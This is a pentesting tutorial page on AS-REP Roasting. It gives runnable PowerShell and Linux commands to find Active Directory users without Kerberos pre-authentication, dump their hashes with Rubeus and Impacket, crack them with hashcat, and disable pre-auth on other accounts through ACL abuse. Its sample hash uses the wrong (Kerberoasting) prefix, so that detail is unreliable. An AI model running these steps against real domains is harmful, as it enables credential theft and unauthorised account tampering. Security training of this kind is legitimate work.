☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Steps to AS-REP Roast
  • Step 1 - Discover AS-REP Roastable Users
  • Step 2 - Grabbing the User Hashes
  • Step 3 - Cracking the Hashes
  • If You Would Like to Disable Preauth on a User
  1. Windows
  2. Active Directory
  3. Privilege Escalation

AS-REP Roasting

Although rare, once in a while you will find that a user does not require Kerberos Pre-Authentication in order to access a service.

If you discover users with Pre-Auth disabled you can grab their hashes, crack them, and then request tickets if you have the privilges to access particular services.

Steps to AS-REP Roast

Step 1 - Discover AS-REP Roastable Users

  • From Powershell

# PowerView_dev
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname

# AD Module
Get-ADUser -Filter {DoesNotRequirePreauth -eq $true} -Properties DoesNotRequirePreAuth | select samaccountname

Step 2 - Grabbing the User Hashes

  • From Powershell

# ASREPRoast.ps1
. .\ASREPRoast.ps1
Get-ASREPHash -UserName VPN403User

# rubeus.exe
.\Rubeus.exe asreproast

# ASREPRoast.ps1
Invoke-ASREPRoast | fl
  • Linux

# Impacket
python GetNPUsers.py <user>@<domain> -usersfile <userfile>

# Crackmapexec
crackmapexec ldap <ip> -u <user> -p <pass> --asreproast ASREPROAST

# Kerbrute
./kerbrute --dc <ip> -d <domain> userenum <userfile> [--downgrade]

Step 3 - Cracking the Hashes

  • Note: make sure the hash ETYPE is 23 and not 18, otherwise Hashcat cannot crack it. Also make sure 23 is in the hash like so, otherwise you may have to add it manually before cracking:

'$krb5tgs$23$*ticket*$d0ed768218535536a...'
  • If you used kerbrute, you can use the --downgrade option to obtain the ETYPE 23 hash

# Hashcat
hashcat -m 18200 hashfile.txt rockyou.txt
# or john
john hashfile.txt -wordlist=rockyou.txt

If You Would Like to Disable Preauth on a User

  • This can be useful if you have permissions on other users.

# Find users you can modify
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<group>"}

# Then disable PreAuth on the user (executing this again will re-enable PreAuth)
Set-DomainObject -Identity <user_to_change> -XOR @{useraccountcontrol=4194304} -Verbose

# Then check if the user PreAuth is now disabled
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname
PreviousPrivilege EscalationNextKerberoasting

Last updated 3 years ago